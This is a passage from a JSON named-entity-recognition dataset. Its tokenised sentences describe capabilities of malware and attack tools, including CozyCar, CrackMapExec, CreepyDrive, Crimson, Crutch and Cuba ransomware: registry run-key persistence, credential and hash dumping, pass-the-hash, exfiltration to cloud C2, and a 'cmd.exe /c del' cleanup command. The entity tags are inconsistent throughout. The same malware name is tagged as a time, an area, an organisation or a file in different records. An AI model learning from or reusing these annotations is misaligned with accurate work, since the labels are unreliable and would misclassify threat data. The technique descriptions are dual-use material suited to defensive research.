"under", "one", "of", "the", "following", "Registry", "keys:", "<br><code>HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>", "<br><code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>", "<br><code>HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>", "<br><code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-SamFile", "O", "O" ] }, { "tokens": [ "The", "CozyCar", "dropper", "has", "masqueraded", "a", "copy", "of", "the", "infected", "system's", "rundll32.exe", "executable", "that", "was", "moved", "to", "the", "malware's", "install", "directory", "and", "renamed", "according", "to", "a", "predefined", "configuration", "file." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "CozyCar", "dropper", "copies", "the", "system", "file", "rundll32.exe", "to", "the", "install", "location", "for", "the", "malware,", "then", "uses", "the", "copy", "of", "rundll32.exe", "to", "load", "and", "execute", "the", "main", "CozyCar", "component." ], "ner_tags": [ "O", "B-Way", "B-SecTeam", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "One", "persistence", "mechanism", "used", "by", "CozyCar", "is", "to", "register", "itself", "as", "a", "scheduled", "task." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Password", "stealer", "and", "NTLM", "stealer", "modules", "in", "CozyCar", "harvest", "stored", "credentials", "from", "the", "victim,", "including", "credentials", "used", "as", "part", "of", "Windows", "NTLM", "user", "authentication." ], "ner_tags": [ "B-Way", "B-SecTeam", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "main", "CozyCar", "dropper", "checks", "whether", "the", "victim", "has", "an", "anti-virus", "product", "installed.", "If", "the", "installed", "product", "is", "on", "a", "predetermined", "list,", "the", "dropper", "will", "exit." ], "ner_tags": [ "O", "O", "B-Way", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "A", "system", "info", "module", "in", "CozyCar", "gathers", "information", "on", "the", "victim", "host’s", "configuration." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "versions", "of", "CozyCar", "will", "check", "to", "ensure", "it", "is", "not", "being", "executed", "inside", "a", "virtual", "machine", "or", "a", "known", "malware", "analysis", "sandbox", "environment.", "If", "it", "detects", "that", "it", "is,", "it", "will", "exit." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CozyCar's", "main", "method", "of", "communicating", "with", "its", "C2", "servers", "is", "using", "HTTP", "or", "HTTPS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "A", "module", "in", "CozyCar", "allows", "arbitrary", "commands", "to", "be", "executed", "by", "invoking", "<code>C:\\Windows\\System32\\cmd.exe</code>." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-SamFile" ] }, { "tokens": [ "One", "persistence", "mechanism", "used", "by", "CozyCar", "is", "to", "register", "itself", "as", "a", "Windows", "service." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CrackMapExec", "can", "set", "a", "scheduled", "task", "on", "the", "target", "system", "to", "execute", "commands", "remotely", "using", "at." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CrackMapExec", "can", "brute", "force", "supplied", "user", "credentials", "across", "a", "network", "range." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CrackMapExec", "can", "enumerate", "the", "domain", "user", "accounts", "on", "a", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CrackMapExec", "can", "gather", "the", "user", "accounts", "within", "domain", "groups." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "CrackMapExec", "can", "discover", "specified", "filetypes", "and", "log", "files", "on", "a", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "CrackMapExec", "can", "dump", "hashed", "passwords", "from", "LSA", "secrets", "for", "the", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CrackMapExec", "can", "create", "a", "registry", "key", "using", "wdigest." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "B-Way" ] }, { "tokens": [ "CrackMapExec", "can", "dump", "hashed", "passwords", "associated", "with", "Active", "Directory", "using", "Windows'", "Directory", "Replication", "Services", "API", "(DRSUAPI),", "or", "Volume", "Shadow", "Copy." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "CrackMapExec", "can", "enumerate", "the", "shared", "folders", "and", "associated", "permissions", "for", "a", "targeted", "network." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CrackMapExec", "can", "pass", "the", "hash", "to", "authenticate", "via", "SMB." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "CrackMapExec", "can", "brute", "force", "passwords", "for", "a", "specified", "user", "on", "a", "single", "target", "system", "or", "across", "an", "entire", "network." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CrackMapExec", "can", "discover", "the", "password", "policies", "applied", "to", "the", "target", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CrackMapExec", "can", "brute", "force", "credential", "authentication", "by", "using", "a", "supplied", "list", "of", "usernames", "and", "a", "single", "password." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CrackMapExec", "can", "execute", "PowerShell", "commands", "via", "WMI." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features", "O", "B-Way" ] }, { "tokens": [ "CrackMapExec", "can", "discover", "active", "IP", "addresses,", "along", "with", "the", "machine", "name,", "within", "a", "targeted", "network." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CrackMapExec", "can", "dump", "usernames", "and", "hashed", "passwords", "from", "the", "SAM." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CrackMapExec", "can", "enumerate", "the", "system", "drives", "and", "associated", "system", "name." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "CrackMapExec", "can", "collect", "DNS", "information", "from", "the", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "CrackMapExec", "can", "discover", "active", "sessions", "for", "a", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CrackMapExec", "can", "execute", "remote", "commands", "using", "Windows", "Management", "Instrumentation." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CreepyDrive", "can", "use", "legitimate", "OAuth", "refresh", "tokens", "to", "authenticate", "with", "OneDrive." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "B-Way" ] }, { "tokens": [ "CreepyDrive", "can", "use", "OneDrive", "for", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "CreepyDrive", "can", "upload", "files", "to", "C2", "from", "victim", "machines." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CreepyDrive", "can", "use", "cloud", "services", "including", "OneDrive", "for", "data", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "CreepyDrive", "can", "specify", "the", "local", "file", "path", "to", "upload", "files", "from." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "CreepyDrive", "can", "download", "files", "to", "the", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "CreepyDrive", "can", "use", "Powershell", "for", "execution,", "including", "the", "cmdlets", "`Invoke-WebRequest`", "and", "`Invoke-Expression`." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-Way" ] }, { "tokens": [ "CreepyDrive", "can", "use", "HTTPS", "for", "C2", "using", "the", "Microsoft", "Graph", "API." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "CreepySnail", "can", "use", "stolen", "credentials", "to", "authenticate", "on", "target", "networks." ], "ner_tags": [ "B-Way", "O", "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CreepySnail", "can", "connect", "to", "C2", "for", "data", "exfiltration." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "B-HackOrg", "O", "I-Purp", "O" ] }, { "tokens": [ "CreepySnail", "can", "use", "PowerShell", "for", "execution,", "including", "the", "cmdlets", "`Invoke-WebRequst`", "and", "`Invoke-Expression`." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "CreepySnail", "can", "use", "Base64", "to", "encode", "its", "C2", "traffic." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CreepySnail", "can", "use", "`getmac`", "and", "`Get-NetIPAddress`", "to", "enumerate", "network", "settings." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "CreepySnail", "can", "execute", "`getUsername`", "on", "compromised", "systems." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CreepySnail", "can", "use", "HTTP", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Crimson", "can", "perform", "audio", "surveillance", "using", "microphones." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Crimson", "contains", "a", "module", "to", "steal", "credentials", "from", "Web", "browsers", "on", "the", "victim", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "can", "collect", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-HackOrg", "O", "B-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "contains", "a", "module", "to", "collect", "data", "from", "removable", "drives." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "can", "decode", "its", "encoded", "PE", "file", "prior", "to", "execution." ], "ner_tags": [ "B-HackOrg", "O", "B-Purp", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "can", "exfiltrate", "stolen", "information", "over", "its", "C2." ], "ner_tags": [ "B-HackOrg", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Crimson", "has", "the", "ability", "to", "delete", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "contains", "commands", "to", "list", "files", "and", "directories,", "as", "well", "as", "search", "for", "files", "matching", "certain", "extensions", "from", "a", "defined", "list." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "contains", "a", "command", "to", "retrieve", "files", "from", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "can", "use", "a", "module", "to", "perform", "keylogging", "on", "compromised", "hosts." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "contains", "a", "command", "to", "collect", "and", "exfiltrate", "emails", "from", "Outlook." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "can", "set", "a", "Registry", "key", "to", "determine", "how", "long", "it", "has", "been", "installed", "and", "possibly", "to", "indicate", "the", "version", "number." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "uses", "a", "custom", "TCP", "protocol", "for", "C2." ], "ner_tags": [ "B-HackOrg", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "Crimson", "has", "the", "ability", "to", "discover", "pluggable/removable", "drives", "to", "extract", "files", "from." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Crimson", "contains", "a", "command", "to", "list", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "can", "check", "the", "Registry", "for", "the", "presence", "of", "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\last_edate</code>", "to", "determine", "how", "long", "it", "has", "been", "installed", "on", "a", "host." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "can", "add", "Registry", "run", "keys", "for", "persistence." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "can", "spread", "across", "systems", "by", "infecting", "removable", "media." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "Crimson", "contains", "a", "command", "to", "perform", "screen", "captures." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "contains", "a", "command", "to", "collect", "information", "about", "anti-virus", "software", "on", "the", "victim." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "contains", "a", "command", "to", "collect", "the", "victim", "PC", "name,", "disk", "drive", "information,", "and", "operating", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "can", "identify", "the", "geographical", "location", "of", "a", "victim", "host." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "contains", "a", "command", "to", "collect", "the", "victim", "MAC", "address", "and", "LAN", "IP." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "can", "identify", "the", "user", "on", "a", "targeted", "system." ], "ner_tags": [ "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "has", "the", "ability", "to", "determine", "the", "date", "and", "time", "on", "a", "compromised", "host." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "can", "determine", "when", "it", "has", "been", "installed", "on", "a", "host", "for", "at", "least", "15", "days", "before", "downloading", "the", "final", "payload." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "can", "capture", "webcam", "video", "on", "targeted", "systems." ], "ner_tags": [ "B-HackOrg", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "can", "use", "a", "HTTP", "GET", "request", "to", "download", "its", "final", "payload." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crimson", "has", "the", "ability", "to", "execute", "commands", "with", "the", "COMSPEC", "environment", "variable." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CrossRAT", "can", "list", "all", "files", "on", "a", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "CrossRAT", "creates", "a", "Launch", "Agent", "on", "macOS." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Tool", "B-Features", "O", "O" ] }, { "tokens": [ "CrossRAT", "uses", "run", "keys", "for", "persistence", "on", "Windows." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "CrossRAT", "is", "capable", "of", "taking", "screen", "captures." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "CrossRAT", "can", "use", "an", "XDG", "Autostart", "to", "establish", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "B-SecTeam", "O", "O", "O" ] }, { "tokens": [ "Crutch", "has", "used", "the", "WinRAR", "utility", "to", "compress", "and", "encrypt", "stolen", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crutch", "can", "automatically", "monitor", "removable", "drives", "in", "a", "loop", "and", "copy", "interesting", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Crutch", "has", "automatically", "exfiltrated", "stolen", "files", "to", "Dropbox." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Crutch", "can", "use", "Dropbox", "to", "receive", "commands", "and", "upload", "stolen", "data." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crutch", "can", "persist", "via", "DLL", "search", "order", "hijacking", "on", "Google", "Chrome,", "Mozilla", "Firefox,", "or", "Microsoft", "OneDrive." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "I-Way", "I-Way", "O", "O", "O", "B-Tool", "B-Way", "B-Tool", "O", "I-Tool", "O" ] }, { "tokens": [ "Crutch", "can", "exfiltrate", "files", "from", "compromised", "systems." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Crutch", "can", "monitor", "removable", "drives", "and", "exfiltrate", "files", "matching", "a", "given", "extension", "list." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crutch", "can", "exfiltrate", "data", "over", "the", "primary", "C2", "channel", "(Dropbox", "HTTP", "API)." ], "ner_tags": [ "B-Way", "O", "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "Crutch", "has", "exfiltrated", "stolen", "data", "to", "Dropbox." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Crutch", "has", "used", "a", "hardcoded", "GitHub", "repository", "as", "a", "fallback", "channel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crutch", "has", "staged", "stolen", "files", "in", "the", "<code>C:\\AMD\\Temp</code>", "directory." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crutch", "has", "established", "persistence", "with", "a", "scheduled", "task", "impersonating", "the", "Outlook", "item", "finder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crutch", "can", "monitor", "for", "removable", "drives", "being", "plugged", "into", "the", "compromised", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Crutch", "has", "the", "ability", "to", "persist", "using", "scheduled", "tasks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "Crutch", "has", "conducted", "C2", "communications", "with", "a", "Dropbox", "account", "using", "the", "HTTP", "API." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Cryptoistic", "can", "retrieve", "files", "from", "the", "local", "file", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cryptoistic", "can", "engage", "in", "encrypted", "communications", "with", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cryptoistic", "has", "the", "ability", "delete", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Cryptoistic", "can", "scan", "a", "directory", "to", "identify", "files", "for", "deletion." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cryptoistic", "has", "the", "ability", "to", "send", "and", "receive", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "O" ] }, { "tokens": [ "Cryptoistic", "can", "use", "TCP", "in", "communications", "with", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Cryptoistic", "can", "gather", "data", "on", "the", "user", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "has", "used", "<code>SeDebugPrivilege</code>", "and", "<code>AdjustTokenPrivileges</code>", "to", "elevate", "privileges." ], "ner_tags": [ "B-Area", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "has", "the", "ability", "to", "encrypt", "system", "data", "and", "add", "the", "\".cuba\"", "extension", "to", "encrypted", "files." ], "ner_tags": [ "B-Area", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "can", "use", "the", "command", "<code>cmd.exe", "/c", "del</code>", "to", "delete", "its", "artifacts", "from", "the", "system." ], "ner_tags": [ "B-Area", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "can", "enumerate", "files", "by", "using", "a", "variety", "of", "functions." ], "ner_tags": [ "B-HackOrg", "O", "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "has", "executed", "hidden", "PowerShell", "windows." ], "ner_tags": [ "B-Area", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Cuba", "can", "download", "files", "from", "its", "C2", "server." ], "ner_tags": [ "B-HackOrg", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "logs", "keystrokes", "via", "polling", "by", "using", "<code>GetKeyState</code>", "and", "<code>VkKeyScan</code>", "functions." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-SamFile", "O" ] }, { "tokens": [ "Cuba", "has", "been", "disguised", "as", "legitimate", "360", "Total", "Security", "Antivirus", "and", "OpenVPN", "programs." ], "ner_tags": [ "B-Area", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "has", "used", "several", "built-in", "API", "functions", "for", "discovery", "like", "GetIpNetTable", "and", "NetShareEnum." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Cuba", "can", "discover", "shared", "resources", "using", "the", "<code>NetShareEnum</code>", "API", "call." ], "ner_tags": [ "B-Area", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "has", "used", "multiple", "layers", "of", "obfuscation", "to", "avoid", "analysis,", "including", "its", "Base64", "encoded", "payload." ], "ner_tags": [ "B-Area", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "has", "been", "dropped", "onto", "systems", "and", "used", "for", "lateral", "movement", "via", "obfuscated", "PowerShell", "scripts." ], "ner_tags": [ "B-Area", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Cuba", "can", "enumerate", "processes", "running", "on", "a", "victim's", "machine." ], "ner_tags": [ "B-Area", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "loaded", "the", "payload", "into", "memory", "using", "PowerShell." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Cuba", "has", "a", "hardcoded", "list", "of", "services", "and", "processes", "to", "terminate." ], "ner_tags": [ "B-Area", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "has", "a", "packed", "payload", "when", "delivered." ], "ner_tags": [ "B-Area", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "can", "enumerate", "local", "drives,", "disk", "type,", "and", "disk", "free", "space." ], "ner_tags": [ "B-HackOrg", "O", "B-SamFile", "I-Features", "O", "O", "B-Features", "O", "B-Features", "O", "B-Purp" ] }, { "tokens": [ "Cuba", "can", "check", "if", "Russian", "language", "is", "installed", "on", "the", "infected", "machine", "by", "using", "the", "function", "<code>GetKeyboardLayoutList</code>." ], "ner_tags": [ "B-Area", "O", "O", "O", "B-Area", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "can", "retrieve", "the", "ARP", "cache", "from", "the", "local", "system", "by", "using", "<code>GetIpNetTable</code>." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "can", "use", "the", "function", "<code>GetIpNetTable</code>", "to", "recover", "the", "last", "connections", "to", "the", "victim's", "machine." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "can", "query", "service", "status", "using", "<code>QueryServiceStatusEx</code>", "function." ], "ner_tags": [ "B-Area", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "has", "used", "<code>cmd.exe", "/c</code>", "and", "batch", "files", "for", "execution." ], "ner_tags": [ "B-Area", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cuba", "can", "modify", "services", "by", "using", "the", "<code>OpenService</code>", "and", "<code>ChangeServiceConfig</code>", "functions." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", 